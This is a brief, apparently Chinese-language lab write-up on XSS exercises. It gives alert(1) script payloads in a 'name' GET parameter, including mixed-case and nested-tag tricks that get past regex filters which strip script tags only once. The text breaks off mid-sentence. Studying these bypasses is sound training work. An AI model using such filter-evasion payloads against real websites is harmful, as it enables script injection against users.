合天網安實驗【XSS進階1、2、三】

直接get,neme=<script>alert(1)</script>php 用正則過濾了<script>和</script>,咱們name=<Script>alert(1)</Script>html 用正則過濾了<script>和</script>(/i表示無視大小寫),但只過濾一次,咱們嵌套繞過neme=<sc<script>ript>alert(1)</s</script>cript>,或
相關文章
相關標籤/搜索